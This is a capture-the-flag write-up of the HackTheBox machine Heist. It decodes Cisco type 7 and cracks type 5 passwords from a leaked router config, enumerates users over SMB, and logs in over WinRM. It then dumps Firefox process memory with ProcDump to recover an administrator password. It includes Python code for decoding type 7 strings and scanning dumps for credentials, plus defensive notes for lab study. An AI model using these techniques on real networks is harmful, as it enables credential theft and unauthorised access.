HackTheBox - Heist


Heist was a nice 20 point box created by MinatoTW. It started out with finding a Cisco router config file and cracking some hashes, enumerating more users and then logging in via WinRM to get the user flag. We then dumped the local Firefox processes with ProcDump, used some simple PowerShell for basic process dump analysis, found admin credentials and logged in again via WinRM to get root.



We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports

80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc         Microsoft Windows RPC


Navigating to the web server on port 80, we come across a login page:

Clicking on ‘Login as guest’ leads us to issues.php which contains the following information:

Checking out the ‘Attachment’ on the first post by Hazard displays a config.txt file for their Cisco router:

version 12.2
no service pad
service password-encryption
isdn switch-type basic-5ess
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
ip ssh authentication-retries 5
ip ssh version 2
router bgp 100
 bgp log-neighbor-changes
 bgp dampening
 network mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
ip classless
ip route
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
no ip http server
no ip http secure-server
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Hash Cracking

The config.txt file contains the following three hashes:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

The number 7 next to the bottom two password hashes indicates that they are Cisco type 7 and can be easily decrypted at Cisco Password Cracker. The results are shown below:

The $1$pdQG$o8nrSzsGXeaduXrjlvKc91 hash can be cracked quickly with JohnTheRipper:

# john --wordlist=/root/rockyou.txt --rules hash 
stealth1agent    (?)


From what we’ve gathered so far we can create a list of usernames and passwords we’ve found and cracked in the config.txt file:

Hazard / ??? - stealth1agent maybe?
rout3r / $uperP@ssword
admin  / Q4)sJu\Y8qz*A3?d
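The reason the type 7 strings fall so quickly is worth seeing in code: Cisco type 7 is not a hash at all but a fixed-key XOR, so `service password-encryption` only hides passwords from `show running-config`, it does not protect them. The following is an added example (not from the original post): a small config auditor that classifies each credential line in the config.txt excerpt above by its IOS type and demonstrates that type 7 values are trivially reversible. `CONFIG_EXCERPT`, `TYPE_INFO`, `audit_config` and `needs_migration` are names chosen here; the XOR key is the publicly documented type 7 constant.

```python
import re

# Cisco's fixed type 7 key. The scheme is documented in many places, which is
# exactly why type 7 counts as obfuscation rather than encryption.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

# Constructed excerpt: the credential lines from the config.txt shown above.
CONFIG_EXCERPT = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

# What each IOS credential type gives an attacker who obtains the config.
TYPE_INFO = {
    "0": "plaintext",
    "5": "md5crypt (salted MD5, 1000 rounds; fast to brute-force offline)",
    "7": "fixed-key XOR (reversible instantly, no cracking needed)",
    "8": "PBKDF2-SHA256 (acceptable)",
    "9": "scrypt (recommended)",
}

# Matches "enable secret <type> <value>" and
# "username <name> [privilege N] (password|secret) <type> <value>".
CRED_RE = re.compile(
    r"^(?:enable secret|username (\S+)(?: privilege \d+)? (?:secret|password)) (\d) (\S+)$"
)


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: two decimal digits give the key offset,
    the rest is hex, each byte XORed with the key at (offset + i)."""
    if (len(encoded) < 4 or len(encoded) % 2
            or not encoded[:2].isdigit()
            or not re.fullmatch(r"[0-9A-Fa-f]+", encoded[2:])):
        raise ValueError("not a type 7 string: %r" % encoded)
    offset = int(encoded[:2], 10)
    if offset > 15:
        raise ValueError("type 7 key offset out of range: %d" % offset)
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(data))
    return plain.decode("ascii")


def audit_config(text: str) -> list:
    """Return one finding per credential line: who it belongs to, the IOS
    type, a description of its strength, and (for type 7) the recovered value."""
    findings = []
    for line in text.splitlines():
        m = CRED_RE.match(line.strip())
        if not m:
            continue
        user, ctype, value = m.group(1) or "enable", m.group(2), m.group(3)
        findings.append({
            "user": user,
            "type": ctype,
            "value": value,
            "note": TYPE_INFO.get(ctype, "unknown type"),
            "recovered": decode_type7(value) if ctype == "7" else None,
        })
    return findings


def needs_migration(findings: list) -> list:
    """Users whose credential is stored with anything weaker than type 8/9."""
    return [f["user"] for f in findings if f["type"] not in ("8", "9")]


if __name__ == "__main__":
    for f in audit_config(CONFIG_EXCERPT):
        shown = f["recovered"] if f["recovered"] is not None else "(crack offline)"
        print("%-8s type %s  %-62s %s" % (f["user"], f["type"], f["note"], shown))
    print("migrate to type 9:", ", ".join(needs_migration(audit_config(CONFIG_EXCERPT))))
```

Run on the excerpt it reports the same two plaintext passwords listed above for rout3r and admin, and flags the enable secret as crackable offline (which is what john did). On the defensive side the fix is to re-enter every credential with `enable algorithm-type scrypt secret ...` / `username ... algorithm-type scrypt secret ...` and to treat any config backup containing type 7 lines as if the passwords were already exposed.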

Given that none of these credentials work on the first login screen we encountered on port 80, we can deduce that they are needed elsewhere in order for us to progress.

From our nmap scan we can see that SMB (445) and WinRM (5985) are both open. None of the creds succeeded for WinRM, but hazard / stealth1agent did work for SMB. However, there wasn’t anything of use in any of the shares.


Leveraging the lookupsid.py script from Impacket we’re able to enumerate more users with Hazard’s SMB credentials.

A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.

# python lookupsid.py heist/hazard:stealth1agent@
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at
[*] StringBinding ncacn_np:[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Descriptions of each Impacket script can be found here.
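The lookupsid.py output above has a regular shape (RID, DOMAIN\name, SID type), so turning it into a clean username list is a few lines of parsing rather than copy-and-paste. This is an added example, not code from the post or from Impacket: it parses the output into records, pulls out the domain SID, and separates real user accounts from the groups and from the built-in accounts that Windows ships disabled (Guest, DefaultAccount, WDAGUtilityAccount). `SAMPLE_OUTPUT` is constructed from the listing above; `SidEntry`, `parse_lookupsid`, `domain_sid`, `user_accounts` and `enabled_user_accounts` are names chosen here.

```python
import re
from typing import List, NamedTuple, Optional

# One result line of lookupsid.py: "<rid>: <DOMAIN>\<name> (<SidType...>)"
LOOKUPSID_RE = re.compile(r"^(\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<kind>SidType\w+)\)$")
DOMAIN_SID_RE = re.compile(r"Domain SID is: (S-1-5-21(?:-\d+){3})")

# Built-in accounts that are disabled by default on Windows 10 / Server 2016+;
# spraying them just generates failed-logon noise.
DISABLED_BY_DEFAULT = {"Guest", "DefaultAccount", "WDAGUtilityAccount"}

# Constructed from the lookupsid.py output shown above, banner line included
# to show that non-result lines are skipped.
SAMPLE_OUTPUT = r"""
[*] Brute forcing SIDs at
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
"""


class SidEntry(NamedTuple):
    rid: int
    domain: str
    name: str
    kind: str  # SidTypeUser, SidTypeGroup, SidTypeAlias, ...


def parse_lookupsid(text: str) -> List[SidEntry]:
    """Parse every RID result line; everything else (banners, blanks) is ignored."""
    entries = []
    for line in text.splitlines():
        m = LOOKUPSID_RE.match(line.strip())
        if m:
            entries.append(SidEntry(int(m.group(1)), m["domain"], m["name"], m["kind"]))
    return entries


def domain_sid(text: str) -> Optional[str]:
    """The machine/domain SID reported in the banner, or None if absent."""
    m = DOMAIN_SID_RE.search(text)
    return m.group(1) if m else None


def user_accounts(entries: List[SidEntry]) -> List[str]:
    """Names of all SidTypeUser entries, in RID order."""
    return [e.name for e in sorted(entries) if e.kind == "SidTypeUser"]


def enabled_user_accounts(entries: List[SidEntry]) -> List[str]:
    """User accounts minus the built-ins that are disabled by default.
    RID 500 (Administrator) is kept: it is built in but normally enabled."""
    return [n for n in user_accounts(entries) if n not in DISABLED_BY_DEFAULT]


def usernames_file_text(entries: List[SidEntry]) -> str:
    """Contents for a one-name-per-line usernames file (trailing newline included)."""
    return "\n".join(enabled_user_accounts(entries)) + "\n"


if __name__ == "__main__":
    found = parse_lookupsid(SAMPLE_OUTPUT)
    print("domain SID:", domain_sid(SAMPLE_OUTPUT))
    print("%d SID entries, %d users" % (len(found), len(user_accounts(found))))
    print(usernames_file_text(found), end="")
```

On the defensive side, the same parser is a quick way to review what an unprivileged SMB session can learn about a host: if a low-value account such as Hazard can walk the RID space, the fix is to restrict anonymous/authenticated SID lookups and to alert on the burst of LSARPC LookupSids calls this produces.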


As we’ve now got a lot more usernames to work with, we can use CrackMapExec to check if any of the new usernames can be used with the passwords we already possess in order to log into SMB. First we need to create a usernames file:

# cat usernames 

Secondly we create a passwords file with the three cracked passwords inside:

# cat passwords 

All we have to do now is run the following CrackMapExec command:

We see Chase / Q4)sJu\Y8qz*A3?d was successful.


Since WinRM is open (5985) we can use evil-winrm to log in with these credentials:

# ./evil-winrm.rb -i -u chase -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> whoami


All we have to do now is change directory and we get the user flag.

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> cat user.txt



During our usual enumeration we notice there are multiple Firefox processes running:

*Evil-WinRM* PS C:\Users\Chase\desktop> Get-Process 

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
   1233      68   106768     179916      27.86   2236   1 firefox
    343      20    10056      37456       0.55   3164   1 firefox
    408      31    17432      61252       2.02   4036   1 firefox
    390      30    27464      59848      22.55   4348   1 firefox
    358      26    16324      37588       0.47   6256   1 firefox  


ProcDump is a tool we can use to dump the Firefox process data.

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. It also can serve as a general process dump utility that you can embed in other scripts.

Dumping Firefox Processes

Once you’ve downloaded ProcDump from the link in the previous section, we need to upload it to Heist like so:

*Evil-WinRM* PS C:\Users\Chase\Documents> upload /root/Downloads/procdump.exe
Info: Uploading /root/Downloads/procdump.exe to .
Data: 868564 bytes of 868564 bytes copied
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Chase\Documents> dir

    Directory: C:\Users\Chase\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/28/2019   7:13 PM         651424 procdump.exe 

With ProcDump successfully uploaded we can dump each Firefox process and then analyse the files for any sensitive information:

*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump.exe -accepteula -ma 6256
ProcDump v9.0 - Sysinternals process dump utility 
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com   
[19:14:54] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_191128_191454.dmp 
[19:14:55] Dump 1 writing: Estimated dump file size is 280 MB.         
[19:14:59] Dump 1 complete: 280 MB written in 5.0 seconds 
[19:15:00] Dump count reached.                                            

Process Dump Analysis

After dumping each process we can then use the PowerShell cmdlet Select-String to ‘grep’ through the dump file for specific words/patterns.

The Select-String cmdlet searches for text and text patterns in input strings and files.

Looking for instances of the string ‘admin’ we get the following information returned:

*Evil-WinRM* PS C:\Users\Chase\Documents> cat firefox.exe_191128_191454.dmp | Select-String -Pattern 'admin'  
_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_C¨^·(VœàšgÿP÷‚]CTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash                  
Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla        
ram Files\Mozilla Firefox\browser\crashreporter-override.iniNU

Removing all the junk we see a login request made by the admin with their username and password in clear text:
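Piping a 280 MB dump through `cat | Select-String` works, but it treats the file as text and returns whole "lines" of binary, which is where the junk above comes from. The following is an added example, not part of the original post: a streaming scanner that does the equivalent of Select-String over raw bytes (case-insensitive, like the cmdlet's default), trims each hit down to the surrounding run of printable characters, and reads the file in chunks with enough overlap that a match or its context straddling a chunk boundary is neither lost nor reported twice. `SAMPLE_DUMP` is a constructed stand-in for a slice of a process dump, with a made-up placeholder where a real dump would hold the submitted password; `scan_stream`, `scan_bytes` and `_context` are names chosen here.

```python
import io
import re
from typing import List, Tuple


def _printable(b: int) -> bool:
    return 0x20 <= b <= 0x7E


def _context(data: bytes, start: int, end: int, context: int) -> str:
    """Grow [start, end) outwards over printable bytes only, at most
    `context` bytes each side, so the binary noise around a hit is dropped."""
    left, right = start, end
    while left > 0 and start - left < context and _printable(data[left - 1]):
        left -= 1
    while right < len(data) and right - end < context and _printable(data[right]):
        right += 1
    return data[left:right].decode("ascii")


def scan_stream(stream, pattern, context: int = 80, chunk_size: int = 1 << 20,
                max_match_len: int = 256) -> List[Tuple[int, str]]:
    """Yield (absolute offset, printable context) for every regex hit in a
    binary stream. Chunks overlap by 2*context + max_match_len bytes, so a
    hit is always seen once with its full left context; hits whose right
    context would be clipped are deferred to the next chunk. Matches longer
    than max_match_len may be missed at a boundary."""
    if isinstance(pattern, str):
        pattern = pattern.encode()
    regex = re.compile(pattern, re.IGNORECASE)
    overlap = 2 * context + max_match_len
    hits, seen, tail, base = [], set(), b"", 0
    while True:
        chunk = stream.read(chunk_size)
        data = tail + chunk
        eof = not chunk
        for m in regex.finditer(data):
            abs_start = base + m.start()
            if abs_start in seen:
                continue  # already reported from the previous chunk's tail
            if not eof and m.end() + context > len(data):
                continue  # right context clipped; the overlap re-presents it next round
            seen.add(abs_start)
            hits.append((abs_start, _context(data, m.start(), m.end(), context)))
        if eof:
            return hits
        tail = data[-overlap:]
        base += len(data) - len(tail)


def scan_bytes(data: bytes, pattern, **kwargs) -> List[Tuple[int, str]]:
    """Convenience wrapper for in-memory data (and for tests)."""
    return scan_stream(io.BytesIO(data), pattern, **kwargs)


# Constructed stand-in for part of a Firefox process dump: environment strings
# like the ones visible above, a captured login form post (placeholder value,
# not a real credential), and binary noise in between.
SAMPLE_DUMP = (
    bytes(range(0, 32)) * 4
    + b"MOZ_CRASHREPORTER_DATA_DIRECTORY=C:\\Users\\Chase\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports"
    + b"\x00\xff\xfe\x01"
    + b"login_username=admin&login_password=EXAMPLE-PLACEHOLDER"
    + b"\x00" * 16
    + b"C:\\Users\\Administrator\\Documents"
    + bytes(range(128, 160)) * 3
)


if __name__ == "__main__":
    # Same call works on a real file: scan_stream(open(path, "rb"), b"admin")
    for offset, text in scan_bytes(SAMPLE_DUMP, b"admin"):
        print("0x%08x  %s" % (offset, text))
```

The design point is the overlap arithmetic: a deferred hit starts no more than `context + max_match_len` bytes before the end of the chunk, and the tail carries `2*context + max_match_len` bytes forward, so when the hit is re-found it has at least `context` bytes of left context available and the offset-based `seen` set stops it being reported twice. From the defensive side, the scan shows why any user who can read a browser's process memory effectively has every credential typed into it; keeping such users out of the local Administrators-equivalent debug privileges and alerting on ProcDump/MiniDump activity against browsers is the mitigation.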


With these credentials we’re able to login via WinRM as Administrator.

# ./evil-winrm.rb -i -u Administrator -p '4dD!5}x/re8]FBuZ'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami


All we have to do now is change directory and we get the root flag.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt